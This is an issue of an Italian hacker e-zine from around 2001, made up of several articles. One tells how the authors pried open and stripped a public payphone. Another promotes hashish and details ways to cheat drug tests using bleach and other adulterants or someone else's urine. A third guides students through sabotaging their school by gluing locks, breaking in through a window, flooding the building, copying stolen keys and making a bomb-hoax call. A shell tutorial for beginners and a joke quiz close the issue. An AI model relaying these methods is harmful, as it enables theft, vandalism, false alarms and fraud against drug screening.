MANUTENZIONE: TEST DIAGNOSTICI Da qui si poteva accedere a tutte le funzioni della cabina semplicemente muovendosi con qualche tasto.Entusiasta chiamai Syn che appena arrivo esclamò: BELLA AVA OTTIMO BRUTE FORZING a questa frase io risposi: MA QUALE BRUTE FORZING QUESTO SEMMAI E' UN CULE FORZING Ora vi elenco lo schema dell'appendice "Test diagnostici" TEST DIAGNOSTICI --------------------- MODEM/AB --------------------- MODULO BASE --------------------- REVISIONI SW/HW --------------------- TELEFONATA --------------------- CONT. TELEFONATA --------------------- LETTORE CARTE --------------------- MODULO MONETE --------------------- DISPLAY --------------------- MICROTELEFONO --------------------- LINEA --------------------- BATTERIA --------------------- SPORTELLO --------------------- EEPROM/FLASH --------------------- DTS --------------------- FAX --------------------- SERRATURA --------------------- SCONTRINATRICE --------------------- C --------------------- BUS --------------------- B.BUS --------------------- GANCIO --------------------- TASTIERA --------------------- Bene queste erano tutte le voci che comparivano ed io dopo aver trascorso piu di un ora ad esaminarle tutte senza pero ottenere nessun risultato soddisfacente mi soffermai su la voce "Sportello" e utilizzando i tasti sul lato sinistro della cabina notai che compariva questa scritta: SPORTELLO CABINA ---------> APERTO A quel punto fui assalito da una strana sensazione che mi rese immobile per qualche secondo.Passato questo istante come per istinto misi le mani sul lato superiore della cabina e diedi una botta secca.Lo sapete cosa accadde,mi ritrovai con la parte anteriore della cabina in mano. A quel punto inizia a vedere cosa conteneva al suo interno la cabina ma visto che c'era ancora troppa gente in strada decisi di socchiuderla e di tornare piu tardi per trafugare qualche pezzo.Cosi io con gli altri boys ce ne andammo a fare un giro maprima preso da un'iresistibile voglia mi avvicinai alla cabina e mi presi un ricordino giusto per non rimanere a mani vuote durante l'attesa. Dopo aver strappato quel pezzo io con tutta la banda iniziammo a correre per andare in un luogo piu solitario.Durante la corsa urlai "Italian freching" da quella frase come potete intuire ho preso spunto per il titolo. Aspettammo in una stradina buia per un po e poi verso le ora 01:00 ci incamminammo per tornare sul luogo del delitto ma per la strada notammo che la pula si era fermata proprio davanti la cabina.Noi pensammo che fosse li causualmente e allora continuammo a camminare dividendoci e facendo i tipi indifferenti.Io e ZI_Pepp eravamo quelli che stavano piu avanti di tutti e avevamo gia superato la pula che si era fermata con la volante qualche metro piu indietro di noi. Ad un certo punto mi girai quardando nella loro direzione e vidi che due agenti erano scesi dalla macchina e si stavano dirigendo verso di noi con un passo molto veloce. A questo punto io e gli altri iniziammo a correre e durante la corsa ci dividemmo per rendere la vita piu difficile alla pula. Dopo aver corso per non so quanto mi ritrovai solo con jrash e Zi_Pepp sotto un ponticello non illuminato.SYn e gli altri non avevo proprio idea di dove fossero andati a finire.Cmq dopo pochi minuti mi arrivo una telefonata di syn che mi aveva detto che si trovava in un luogo sicuro cosi dopo poco lo raggiungemmo. Decidemmoche era meglio lasciar perdere per quella sera cosi ognuno si ritiro a casa propria. Arrivato a casa mi spogliai e dopo essermi messo il pigiama andai a letto e poi........ Non penso voi abbiate voglia di leggere la cronaca della mia vita quindi proseguiamo. Ci rincontrammo tutti la sera seguente cosi con il solo intento di finire il nostro lavoro e cosi organizzati e armati di cacciaviti ci avvicinammo alla cabina e asportammo tuto quello possibile.I pezzi che trafugammo e di cui poi abbiamo anche scattato le foto che dovrebbero essere allegate a Dirtynet sono i seguenti: BATTERIA lETTORE SCHEDE DISPLAY MODEM INTERNO Abbiamo anche molti altri pezzi che ancora dobbiamo esminare, in poche parole ci siamo portati la cabina a casa tranne pero l'involucro di acciaio.Pensate che la cabina è ancora li chiusa senza nulla dentro e vista dall'esterno sembra una normale cabina. [Sul sito ufficiale di DirtyNet www.hackersat.com potete ammirare anche le foto ricordo fatte in giorni successivi.] Portammo tutti i pezzi nel garage di jrash e li esaminammo uno ad uno. Nell' esaminare il lettore schede notammo che esso è composto da tre parti unite in sieme che potevano essere sganciate per mezzo di semplici agganci.Smontando uno di queste tre pezzi notammo che questo conteneva una sim card identica a quelle dei cellulari, allora provammo ad inserirla nel telefonino di jrash ma non accadeva nulla.Visto che sulla sim non era specificata la grandezza in kb ho pensato che forse un normale telefonino non puo leggere una carta sim di grandi dimensioni cmq questa è solo un'ipotesi se qualcuno avesse qualche notizia puo farmelo sapere scrivendomi alla solita e-mail.Ah dimenticavo sulla sim c'era un numero probabilmente seriale ora vi riporto il codice sotto. : T0000928 000000001841 M64LEU2GSI TEL. ITALIA : Bene abbiamo finito io vi ho detto proprio tutto spero che il mio italiano sia comprensibile altrimenti un po di pazienza non si puo avere tutto dalla vita. Ringrazio: -sYn che ha messo a disposizione il suo computer che mi ha permesso di scrivere la prima parte di -questo articolo. -Zi-Pepp,Jrash,MinM, anche loro prottagonisti di questa avventura. -Tutti i ragazzi del Dj time che hanno fatto da colonna sonora di questo articolo. -Tutti le mie ammiratrici sparse per l'italia. /===========================::=============================::=================/ / /Maria consigli e oltre / phaet / /===========================::=============================::=================/ NaRCoTiNG Introduzione: Prima abbiamo parlato della coltivazione della buonissima Maria ora parliamo del suo utilizzo =)) (questa parte mi fa morire)!!! bisogna dire ke qui a Salerno nn e' ke giri molta maria ma gira abbastanza Hashish e parlero' sopratutto di quest' ultimo! Ultimamente ho provato nel cesso della scuola della crema di marocco e devo dire ke e' mooooolto buona e sono rimasto sballato per circa 4 ore!!!! PROVATELA RAGA!!!! Come si rolla: Per i meno esperti ho deciso di inserire questo breve articolo al rollaggio ovvero alla kiusura della canna, joint, spinello o come cavolo lo volete kiamare: Una canna si rolla come una sigaretta. Arrotola il filtro tra pollice e indice di una mano. Con l'altra mano (pollice, indice e medio) livellare il tabacco. Avvolgere la cartina intorno al filtro e fare scorrere il foglio intorno al tabacco. Leccare la gomma ed incollare la cartina. Comprimere delicatamente il tabacco con una penna o un filtro di sigaretta. Legare l' estremità della canna in caso di trasporto. Non fumare più carta di quanto sia necessario! Rollare la canna con la parte gommata all'esterno. Umidificare la gomma e ripiegare la cartina, bruciare la carta eccedente. Molto utile per gli spini o per le cartine King size. MiNkIa KE PAuRa vostra mamma vi fa fare le analisi delle urine per vedere se fumate??!! NO PROBLEM!! (mia mamma me le ha fatte fare ultimamente e sono uscite negative cioe' pulite!) METODI DI PROVA Ci sono quattro tipi di test delle urine, una prova del capello, una prova di traspirazione e di una prova di rimanenza. Prima di continuare, devo dire che questo testo principalmente si applica all'analisi delle urine che è il più diffuso perché è quello che costa meno. Tuttavia, provo a coprire metodi per passare tutti i test. 1 Sostanze che sono individuabili: La tavola sotto indica che cosa può essere trovato in prove di selezione. [TABELLA] Anfetamine Antidepressivi . Barbiturici Benzodiazepine Cannabinoidi Cocaina . LSD. Metadone . Morfina Sonniferi . Steroidi. oltre al test delle urine vediamo prima quello del capello ke per molti e' un metodo sconosciuto e vediamo come funziona: Test del Capello: Quando i metaboliti del THC sono nel sangue, essi passano attraverso i vasi di sangue nella testa e rimangono nei capelli. i metaboliti del THC rimangono nei capelli come una registrazione permanente. La prova di capelli costa 300 - 600.000 e è raramente fatta perché l'analisi delle urine è più economica (circa $130.000) e più affidabile. ( l'apparecchiatura costa intorno al milione di $). Questo test consiste nell'analizzare una ciocca di capelli, polverizzata e sciolta in solventi, attraverso la Gas Cromatografia/Spettrometria di Massa. I capelli crescono in genere di 0,5 cm al mese quindi si può indagare il passato se hai i capelli di 10 cm si può controllare il tuo consumo di droga dei passati 20 mesi. Passare la prova di capelli è estremamente difficile, per fortuna, la prova del capello non ha validità legale. Esistono sul mercato e si stanno sviluppando in America numerosi Shampoo ma la loro efficacia è tuttora dubbia TEST ESEGUITI PER RILEVARE ANTIDOTI AL TEST I laboratori sanno come sia facile manomettere campioni di urina e modificare i risultati. I laboratori fanno spesso prove per scoprire se il campione è legittimo. 1) colore: Se un campione di urina sembra chiaro, il laboratorio sospetterà che sia stato allungato con acqua. È possibile che essi non lo descrivano come positivo, ma essi possono rifiutare il campione e informare chi ha richiesto il test del tuo tentativo di falsificare la prova. La vitamina B colora di giallo l'urina. 2) temperatura: L'urina dovrebbe essere tra 32 e 36 gradi. I laboratori controllano la temperatura per prevenire l'aggiunta di acqua e la sostituzione dei campioni con campioni puliti. 3) Creatina: è una sostanza prodotta da vertebrati e è presente nell'urina. I Laboratori cercano la creatina per verificare che l'urina non venga sostituita con qualcosa diverso. Mangiare cibi ricchi di carne rossa aumenterà i livelli di creatina. 4) pH: il PH cambia facilmente quando la gente trucca il loro campione con prodotti di fatti in casa. Utilizza cautela nel truccare l'urina, il pH è di solito testato. 5) Peso Specifico: un Peso Specifico insolito indica che un campione è stato manomesso. E ora parliamo della fatidica URINA!!!!! ecco alcuni metodi per sputtanare il laboratorio di analisi (10x a mio zio ke mi ha fornito i dati) PRODUZIONE DI URINA PULITA Il THC è solubile nei grassi, e viene conservato nelle tue cellule grasse. Eliminarlo dai tessuti grassi è molto difficile. Molti prodotti erbacei sostengono di ripulire il tuo corpo, tuttavia non fanno niente per rimuovere i sottoprodotti del THC dalle cellule grasse. Uno studio è stato fatto in Germania nel 1993 su 50 delle erbe più comuni utilizzate dalla gente che prova a passare i test. Tutte le 50 erbe non sono riuscite a far passare il test. Sfortunatamente, questa chiacchera non morirà. L'unico modo per estrarre THC da cellule grasse è fare esercizio fisico (5.8). Le cellule grasse secernono grasso con i metaboliti del THC a un tasso costante, indipendentemente da quali erbe tu assumi. Tu puoi essere in grado di pulire temporaneamente THC metabolites dal tuo flusso sanguigno o diluire i tuoi fluidi per produrre un rapporto THC/urina minore, ma il tuo flusso sanguigno continuerà a ritirare il THC dal grasso e la tua urina continuerà a ritirare metaboliti dal flusso sanguigno. 1) diluizione: Iper saturare il tuo corpo con fluidi diluirà i metaboliti possibilmente sotto la 50 soglia ng/mL, a seconda del tuo metabolismo. Sii consapevole che i livelli creatina vengono spesso testati e mostreranno che il campione è stato diluito. Diluire il tuo campione produrrà anche urina chiara, senza potenzialmente alcun colore giallo. È utile cominciare a bere subito prima della prova. Quelli che si affogano in giorni fluidi prima di una prova causano solo disagio non necessario. Quelli che stanno alzati tutta la notte bevendo non hanno maggiori possibilità di uno che beve la pesantemente per prima cosa la mattina. Alzati presto se la prova è di prima mattina, ma non perdere sonno se la prova è di giorno. 1 acqua: Bevi almeno otto bicchieri grandi di fluido (preferibilmente acqua) appena prima della prova. L'acqua non diluisce il THC ma solo l'urina e temporaneamente. Risulta molto Utile. 2 livello di Creatina: Mangiare carne rossa aumenterà livelli Creatina. Se tu mangi carne rossa 3 giorni prima della prova, il tuo livello di Creatina sarà normale e il laboratorio non saprà che tu hai diluito il tuo campione di urina. 3 vitamina B: Colora di giallo il tuo campione portando a da 50 a 100 milligrammi di vitamina B. Molte vitamine funzioneranno, ma B-2 o B-12 (trovati in vitamine B complesse) sono le più efficaci, sebbene alcuni argomentano che la vitamina C sia migliore. Questo aiuterà anche se tu prevedi di truccare il campione. Questo non garantisce che la diluizione funzionerà se i livelli di Creatina, PH e il peso specifico non sono rispettati. 2 diuretici: I diuretici fanno in modo che la gente urini frequentemente e che quindi il campione risulti diluito. Caffè, succo di mirtillo, birra, tè, Pepsi e tisane, sono tutti buoni diuretici. 3 aceto: C'è un mito che bere aceto maschera le droghe; Non è vero. Tuttavia, l'aceto diminuisce il pH dell'urina. Le anfetamine sono espulse fino a 3 volte più velocemente quando l'urina è più acida. Cosicché l'aceto potrebbe ridurre il periodo di tempo di scoperta per anfetamine. Non vale la pena bere aceto e causa diarrea. 5 fibra: Una dieta ricca di fibre aiuterà a espellere i metaboliti solubili tramite l'intestino piuttosto che nell'urina. 7 Come dare un campione pulito: Non dare urina della prima pisciata del giorno. È la più sporca e può essere piena di metaboliti. Urina un paio di volte prima di dare un campione di prova. Inoltre, non dare l'inizio o la fine della pisciata. Piscia nel gabinetto, quindi fermati velocemente e dai il campione, spostati al gabinetto per l'ultima parte 8 esercizio fisico: Gli atleti hanno un grande vantaggio rispetto alle persone normali. Quando il grasso è bruciato, i sottoprodotti del THC sono rilasciati nel sangue. Questo è l'unico modo per espellere i metaboliti dai tessuti grassi. "la vita normale li brucerà lentamente, quando i tessuti grassi li rilasceranno" (Dott. Grow). Fare esercizio fisico pulirà il tuo corpo dai metaboliti più velocemente, diminuendo così il periodo di scoperta. Smetti di fare esercizio una settimana prima della prova perché siccome elimini metaboliti quando fai sport, la loro presenza nel sangue e nelle urine è più alta. Essere pigro e mangiare molto farà si che il corpo immagazzini i grassi e il metabolita viene a sua volta immagazzinato piuttosto che espulso. ANTIDOTI ALLA DROGA Alcune sostanze chimiche prese oralmente mascherano le tracce di droghe nell'urina. Antidoti che funzionano: 1 L'Aspirina: prendere 4 aspirine alcune ore prima della prova potrebbe aiutarti. L'aspirina interferisce con il metodo di test spettrometrico dell'urina e consiglio certamente di sfruttare la situazione e utilizzare aspirina. ALTERARE I CAMPIONI "drogare" campioni consiste nell'aggiungere al campione varie sostanze chimiche. Sostanze chimiche che impediscono all'immunoglobulina di legarsi all'antigene vi faranno risultare negativi al test delle urine. 1 additivi Efficaci: Questi additivi sono raccomandati. 2 Candeggiante: Il candeggiante in Polvere vi varà risultare negativi e è il miglior additivo fatto in casa. In un'emergenza, Jeff Nightbyrd raccomanda di aggiungere cristalli di candeggina inodore a un campione diluito. Si raccomanda che macini la candeggina polverizzata a un grano più fine. 1/4 cucchiaino da tè è raccomandato per un campione da 60cc. Se hai della candeggina liquida aggiungi al campione da 60cc da 6 a 10 gocce. La candeggina però alza il Ph; cosicché può essere evidente che il campione era manomesso. Alcune candeggine spumeggiano o lasciano residui, fai esperimenti con varie marche prima di scegliere quale utilizzare. 3 acqua: Tu puoi diluire il tuo campione pesantemente con l'acqua. Puoi anche aggiungere l'acqua direttamente al campione. Assicurati di utilizzare l'acqua calda (tra 32 e 36 gradi), perché probabilmente prenderanno la temperatura del campione. Fai sembrare che tu lavi le mani o qualcos'altro. 2 additivi Inefficaci: Questi additivi non sono raccomandati. Molti di questi possono dare risultati di prova negativi, ma non sono raccomandati. 1 ammoniaca: 60 grammi renderanno il campione negativo. Ma il pH viene modificato e l'odore di ammoniaca è facile da essere riconosciuto. 2 sangue: È stato detto che alcune gocce di sangue aggiusteranno il tuo campione; non funziona 5 perossido di Idrogeno (Acqua Ossigenata): nelle concentrazioni in commercio distruggerà metà dei metaboliti. 6 succo di Limone: Il succo di limone è un mito; non cambierà i risultati della prova. 7 sapone Liquido: Funziona, ma rende il campione torbido, è certamente sospetto. 8 il SuperClean 13 di Mary Jane 9 Purifyit : Creato in Europa, Oklahoma NORML (ditta americana) si rifiuta di rivendere questo prodotto perché ha bocciato troppi conducenti di autocarro. 10 nitrato di Sodio: Questo è più efficace del sale da tavola(sotto), ma si scioglie male. 11 sale da Tavola: Due cucchiai da tavola di sale darà risultato negativo, ma mette la densità fuori dalla gamma normale. Il residuo può essere visto anche in fondo alla provetta. 12 UrinAid : UrinAid, prodotto da Byrd Labs, è molto potente e funziona ogni volta per mascherare il THC e nicotina ma non cocaina o eroina. UrinAid è provato nel 5% dei laboratori. Oklahoma NORML ha cessato di vendere questo prodotto perché è "troppo individuabile". In Italia probabilmente FUNZIONA. 13 aceto: Aggiungere aceto al tuo campione darà risultato negativo, ma fa cadere anche il pH. Infatti, diminuire il pH è fa in modo che il campione sia negativo. Ma il Ph viene testato e ti scopriranno. 14 Visine (Gocce Nasali): risultato discutibile. Byrd Labs ha concluso che Visine non funziona. Clinton ha detto che il laboratorio in cui egli ha lavorato provava Visine e ha concluso che Visine da una negazione falsa per l'esame delle urine 15 WD40: Un altro mito. WD40 può solo fare a danno. 3 additivi Non Testati 1 Papain: Questo è un enzima disponibile in farmacia. Non è risaputo se questo faccia qualcosa. provato e può o non può funzionare. 9. SOSTITUZIONE DELL'URINA Questo metodo funziona per ogni prova di urina, sempre. Tu semplicemente dai a loro urina pulita (non la tua). Questo funziona molto bene se tu non sei sorvegliato. Se sarai sorvegliato, prova a chiedere di essere lasciato solo " non voglio che mi guardi mentre piscio!. 1 metodi di Sostituzione: Ci sono tre metodi, ma due di loro sono dolorosi. Il modo più comune è portare urina è in un contenitore nascosto. 1 contenitore Nascosto: Nascondi semplicemente l'urina. La prima volta che tu sei solo con il contenitore che ti danno, scarica la tua urina nascosta. Assicurati di potere aprire quietamente il contenitore; il personale di laboratorio può origliare alla porta. Porta i pantaloni lunghi. Se così, un profilattico può essere nascosto sotto i pantaloni vicino alla coscia. Le femmine possono tenere un condom con il campione di urina nella vagina e pungerlo con un'unghia e pisciare sotto supervisione. Assicurati di tenere i campioni tra 32 e 36 gradi. 2 dove ottenere urina pulita. 1 Urine da un donatore: Tu puoi usare l'urina di qualcun altro. Chiedi (auspicabilmente un amico in cui puoi avere fiducia) al tuo donatore di urina quali droghe essi hanno preso nel mese scorso. Se l'urina invecchia oltre 18 ore, il deterioramento diventa notabile e il laboratorio può sospettare qualcosa. 1 Urina in Polvere: Conserva la tua urina quando sei sicuro di avere fatto un buon periodo di astinenza, 30 giorni sono sicuri. Urina in un contenitore di vetro. Fai evaporare. Quindi raschia l'interno per il residuo. Mescolalo con l'acqua prima della prova e il campione avrà la gravità specifica corretta, pH, colore, ecc. 3 urina di Cane: L'urina di cane può essere utilizzata nella sostituzione e passerà la prova! Questa sotto sezione suppone che tu abbia un cane pulito. So che l'urina del mio cane non passerebbe; egli mangia più erbaccia degli esseri umani. Avrebbe più senso utilizzare urina umana, ma l'urina di cane può servire in un'emergenza. 10. RUBARE IL CAMPIONE Rubare il campione, può funzionare perché il laboratorio non ammetterà mai che il campione sia andato perso e non chiederà di rifare la prova. Non aspettarti che questo metodo funzioni se tu vieni provato dalla polizia o dai militari. Finitoooooooooo!!! mi raccomando raga so ke nn mi starete mai a sentire ma io lo debbo dire : usate questi consigli solo in casi urgenti vabbuo' si vede ke ho appena fumato?? /===========================::=============================::=================/ / /Come impallare la scuola / sYn / /===========================::=============================::=================/ Salve ragazzi. Se leggete questo articolo significa che odiate la scuola vero? Se c'è qualcuno che la ama mi invi una email! Io la scuola la odio da parte dei professori, xchè a me piace un sacco imparare le materie. Comunque adesso facciamo male a questa stramaledetta struttura poco organizzata. Vi incito tutti a farvi un giro di notte nella vostra amata scuola, vi potra' sempre servire. Ad esempio per vedere le luci accese, le abitazioni vicine ecc... Quando io e i miei amici entriamo nella scuola ci mettiamo ad impennare un po' col mezzo. Naturalment vi potrete chiedere, come entriamo se è recintato? A questa domanda poco posso rispondere. Infatti la nostra scuola è minimamente protetta, x questo entra anche un motorino! Dovreste scavalcare i recinti o fare altro...insomma con questa impresa dovete cavarvela voi. Adesso passiamo ad impallarla un po'.Andate di notte e nella serratura del cancello principale inserite della colla (tipo attack) ad adesione istantanea o meglio del silicone. In questa operazione potete abbondare con la sostanza. I bidelli che vengono alle 7 proveranno in tutti i modi di liquefare la colla o altro. una volta lo abbiamo provato ha funzionato ma... solo per 1 ora! Naturalmente gli alunni staranno fuori dall'istituto ad aspettare che il problema venga risolto, ma ben presto si risolvera' nel frattempo molti degli alunni avranno gia fatto la saggia decisione di marinare !! Il testo a questo punto sarebbe finito...ma voi mi odiereste a morte! Allora passiamo ad un'altro imapallamento. Poco graditi agli alunni sono i cosidetti "vermi". Questi vermi (molti) dovreste gettarli per le scale o per le singole aule . Inutile che ve lo dica, è meglio entrare nell'istituto di notte e gettarli, xchè potrste facilmente essere presi con le mani nel sacchetto! Ma avere accesso proprio nell'istituto è difficile; difficile solo se ci sono delle protezioni anche alle finestre delle aule esterne. Altrimenti dovreste avere le chiavi...ma questo ve lo spieghero' dopo. Prendiamo di esempio che non ci siano protezioni ai vetri. Andate 3 di voi (almeno in 3 dovete stare) nei pressi dell'istituto e organizzatevi oltre a vedere se ci sono delle complicazioni. Uno di voi deve rimanere nell'esterno dell'istituto . Ognuno di voi deve possedere un telefonino con i toni silenziosi. Il ragazzo che si trova all'esterno deve solamente avvertire se accade qualcosa. Due di voi invece devono penetrare nell'istituto. Spaccate con un panno sulla mano un vetro di una classe al primo piano ed entrate facendo preferibilmente poco rumore. Ad andate per classe in classe a spargere i vostri vermi (acquistate i bigattini o meglio quei vermi simili alle esche coreane..oppure fabbricateli voi!). Dato che ormai siete dentro ci sarebbe una notevole alternativa o diversivo ai soliti vermi. Ovvero "l'allagamento". Ebbene si la vostra scuola non è stata mai allagata ? C'è sempre una prima volta. E' una cosa abbastanza semplice.Andate in quasi tutti i bagni e iniziato a chiudere i lavandini e poi aprite i rubinetti al massimo. Potreste fare anche così : Se ci sono delle pompe idrauliche potreste usarle e lasciale aperte, posandole sul piano + alto dell'istituto. Fate questa operazione con cautela e non troppo fracasso. Bene una volta che avete finito quello che dovevate fare dentro l'istituto dovete uscire. Avvertite il compagno che state per farlo. A questo punto l'ideale è uscire per un'altra parte, non per l'entrata principale della scuola. Questo lo dovete fare sopratutto se accidentalmente scatta l'allarme mentre state dentro. Ad esempio (mio istituto): CAMPI ingresso principale - - - -- - - -- - - - - - - - --- -- - - - -- - |- -- - - - - - - - -- - -|- - -- / / / / c / a / m / p / i / / / / / / <--------------- qui potreste scavalcare o oltrepassare / / / / / ----------------------------------- / \ \ \ \ \ \ \ \ \ \ ------ \ \ - - \ \ - - \ \ - - \ ISTITUTO \ - - \ \ - - \ \ - - \ \ ----- \ \ palestre \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ ----------------------------------- | | usatela solo se sbocca | in isolati poco | abitati | \/ | uscita secondaria | ------------------------------------------------------- ----------------- Questo che vi ho appena citato non sono tutti i medoti per mandare la scuola a puttane ce ne sarebbero degli altri, pero' questi sono tra i migliori. An piccolissimo esempio è scrivere con bombolette su tutti i muri frati ingiuriose o altro... oppure la mattina fare una chiamata a scuola con una voce modificata dicendo che è stata istallata un ordigno nascosto...alle media ci provammo funziono'. Arrivarono i carabbi e restammo tutti noi alunni fuori per un'ora!! METODO CHIAVI Be' per alcuni potrebbe apparie uno stupido metodo...ma in realta' si puo' rivelare DAVVERO soddisfacente. Non dovete fare altro che andare a scuola di pomeriggio (per l'entrata principale!!) , praticamente quando tutti ci possono entrare per fare i corsi pomeridiani. Se qualche bidello da' fastidio dovete inventarvi una palla, magari che dovete consegnare una cosa alla prof. (portatevi qualche foglio che dovrete presentare alla prof se il bidello per caso vi accompagna!). In qualche modo poi dovrete entrare nella famigerata "segreteria". E cercare li tutti i mazzi di chiavi.So che per molti sara' una cosa difficilissima ma noi abbiamo trovato i mazzi proprio li'!Dopodichè andate da un ferramenta e fate la copia di tutte le chiavi, tanto costa poco (1000 £ a chiave circa). E infine riportate il tutto nel posto dove l'avete trovate; questo deve avvenire solo nel pomergiggio e non nei giorni seguenti. MATERIALI per 3 persone 2 Torce, sopratutto se non c'è illuminazione 1 Scaletta, solo se è difficile raggiungere le finestre 3 Cellulari, per la comunicazione Un abbigliamento che non da' nell'occhio. Preferibilmente nero. 2 Scooter fuori dal recintato farebbero comodo. Li lasciate parcheggiati. 1 Coltellino, che fa sempre comodo 1 Straccio, potreste usare anche la vostra maglia se è davvero vecchia e naturalmente altro materiale come i vermi, per l'azione... penso che basti. sAluti sYn syn@hackersat.com www.hackersat.com /===========================::=============================::=================/ / /Shell for lamah / Jrash / /===========================::=============================::=================/ 1° PARTE Introduzione 2° PARTE Procurarsi una shell 3° PARTE Cos è una shell 4° PARTE Connessione telnet con shell 5° PARTE Come registrare un account 6° PARTE Comandi fondamentali 1° PARTE Salve ragazzi sono il vostro amicone Jrash, in questo articoletto vi parlero un po' della shell, e cioè cos è, come si usa, eccetera.... Questo articolo è proprio per coloro che hanno voglia di imparare e cioè per coloro che si possono definire Hacker alle prime armi, anche io sono uno alle prime armi che pensate e questo e tutto cio che ho imparato finora...tutto questo, appunto lo devo al mio grande amico A[v]a[t]A[r] che mi ha insegnato queste cosette basilari. Ora passiamo alla parte interessante perche credo che con questa intro vi abbia annoiato.... attenti pero a quello che dico mi raccomando!!! 2° PARTE Come procurarsi una shell?? Questa è proprio na bella domanda! Non vi preoccupate che ci penso io a questo o gia provveduto! Ora vi daro un paio di siti dove potete trovare tranquillamente una shell. Eccovi i siti: http://www.freeshells.net http://www.cyberspace.org http://www.continuum.eu.org http://dishboy.dyn.ml.org http://www.nyx.net http://vester.dyn.ml.org http://www.vexation.org http://www.arbornet.org/projects.html http://www.unixnet.org Per avere maggiori informazioni riguardo a come procurarsi una shell gratis andate a dare un occhiata all articolo del mio caro amico syn "FRREBIE E SHELL" che è stato pubblicato nel numero 2 della rivista dirtynet... Per accedervi, una volta trovata, basta aprire un qualsiasi telnet e digitare per esempio cyberspace.org su host name, mentre lasciate invariate le altre impostazioni. Questa shell pero non è il massimo ma per un hacker alle prime armi va bene anzi benissimo... Poi piu il la' quando sarete un po piu esperti sceglierete una shell migliore o anzi potete addirittura crearvela da voi. 3° PARTE Cosa è una shell? è una cosa complicata da spiegare ma io ci provero' lo stesso in modo da farvi assimilare esattamente cosa sia .La shell e' quell'interfaccia, quella che al posto del solito prompt di MS-DOS o Windows tipo C:\>_ ci mostra un prompt del tipo % oppure $ oppure # Usare una shell è come usare il sistema UNIX e quindi potete eseguire molti comandi tipici di questo sistema.Avere una shell è fondamentale per chi vuole essere considerato un hacker e per chi ha voglia di imparare. 4° PARTE Ecco qui "ten Meinel Hall of Fame LAN and Internet Exploration Tools" by Carolyn P. Meinel, ovvero 10 comandi "that you absolutely must have access to": 1) telnet fondamentale, se non puoi telnettarti con nessun sistema, "you are totally crippled as a hacker" e quindi cercati all'istante un'altra shell 2) who mostra quali altri utenti sono connessi 3) netstat mostra statistiche come per esempio la lista delle connessioni del server ad internet 4) whois per avere informazioni su un sito internet 5) nslookup altre info, cosi' come il prossimo comando 6) dig 7) finger vedi l'altro articolo per l'e-zine :-) 8) ping per vedere se un sito e' attivo e come e' la connessione a quell'host (lenta, veloce... ecc) 9) traceroute traccia il percorso dei vari pacchetti spediti ad un certo host 10) ftp per eseguire download e upload di files su altri computer. Ora sta a voi giudicare la shell che avete appena trovato, se e' utile oppure da scartare. 5° PARTE Ok, allora vediamo un po' come funziona la piu' famose delle varie shell che sono in giro, ovvero la shell Grex, che trovate all'indirizzo Cyberspace.org:23 Allora, per prima cosa vi trovate di fronte al saluto della macchina, e alla richiesta di login. Dato che non vi siete mai collegati (o se l'avete fatto, rifatelo, cosi' almeno leggete anche questa parte dell'articolo eheheheh..) vi viene chiesto di digitare come: full name: address: telephone number: occupation: computer equipment: born: sex: interest: comments: Naturale che non siete obbligati a scrivere i vostri dati giusti giusti. Infine chiede se volete rendere pubblici i vostri dati oppure no.Segue la scelta della shell, nel senso dell'interprete dei comandi, la cosa piu' importante, perche' se scegliete una shell di cui non sapete i comandi... be''...dovrete cambiarla. L'ultimo passo: la scelta della login e della pass, e poi siete a posto, avete la vostra shell, ripeto, che va benissimo per i vostri primi esperimenti di newbie (e lo siete, altrimenti avreste saltato a pie' pari quest'articolo eheheh!) ma che poi dovrete abbandonare per rimpiazzarla con la vostra shell di fiducia che vi permette i servizi citati nella parte 4ø. 6° PARTE Be'... sono logicamente comandi UNIX, quindi: -cd per muoversi nel file system -ls come il comando "dir" per dos -cp come il comando "copy" per dos -rm come il comando "del" per dos -mv come il comando "move" per dos -mkdir come il comando "md" per dos -rmdir come il comando "rd" per dos -man fornisce info su quel comando -more visualizza il file Questi sono solo i comandi basilari per muoversi. Per ora è tutto ma se volete maggiori informazioni riguardo a telnet e i vari giochetti che si possono fare con esso, come per esempio mandare FAKEMAIL andate a dare un occhiata agli articoli del mio amico A[v]a[t]A[r] o sYn che vi giuro sono davvero ben fatti.... Questi articoli potete trovarli nell 1° , nel 2° e nel 3° e anche in questo numero della rivista dirtynet,... Potete trovarla sul sito www.hackersat.com ........ Se avete dubbi, incertezze ed altro potete scrivermi al seguente indirizzo di posta elettronica: jrash@hackersat.com Un grosso bacione per la mia amata Giada e per tutte le ragazze della 3c del severi di salerno! ByEzZ.........................lol...................lol..... 22/03/2001 ======H@=========H@=========H@========H@========H@=========H@=========H@=========[Jrash]° /===========================::=============================::=================/ / /Test d'intelligenza! / sYn / /===========================::=============================::=================/ Contate quante risposte date esatte. IMPORTANTE: riflettete bene sulle domande. 1)Punto la sveglia alle ore 9:00 e vado a dormire alle 8:00.Quante ore dormo? -1 2)Entri in una stanza buia con un fiammifero in mano. Trovi una lampada a gas, una a petrolio ed una candela. Cosa accendi per prima? -Il fiammifero 3)Dividi 30 x 2 e aggiungi 10. -25 4)Un contadino ha 15 mucche.Muoino tutte tranne 9. Quante mucche sono vive? -9 5) Il dottore ti ordina una cura veloce. 3 pastiglie da prendere in ogni mezz'ora, quante ore dura la cura ? -1 6)In Russia un uomo puo' sparare alla sorella della sua vedova ? -No 7)Quanti mesi hanno 28 giorni? -Tutti 8)Il 25 Aprile c'è anche in Inghilterra ? -Si 9)Perchè alcuni italiani portano le bretelle rosse, bianche e verdi? -Per mantenersi i pantaloni 10)Cosa è successo il 25 Dicembre 1989? -Il Natale 11)Quanti animali porto' Mosè sull'Arca ? -Era Noè... 12)Un metronotte muore di giorno, gli danno la pensione ? -No, è morto 13)Cade un aereo dalla Germania con 20 tedeschi a bordo, dove vengono seppelliti i superstiti? -Se sono superstiti... 14)La mamma di Pierino ha tre figli :Quo' Qui' e ...? -Pierino 15)Quante dita ha una mano? Due mani? 10 mani? -5 -10 -50 16)Inuna vasca ci sono 10 pesci, ne annegano 5, quanti ne rimangono? -Non annegano 17)Quante gambe ha un'elefante? Se ne alza una? -4 -4 18)Un palazzo ha 12 piani ,ogni piano ha il nome di un mese, come si chiama l'ascensore ? -Col pulsante 19)Se 5 ragazzi mangiano 5 gelati in 5 minuti, in quanto tempo 50 ragazzi mangeranno 50 gelati? - minuti FINE GRADI OTTENUTI Su quante risposte errate. 1=superdotato 2=dotato 3=molto intelligente 4=intelligente 5=normale 6=quasi normale 7=stupido 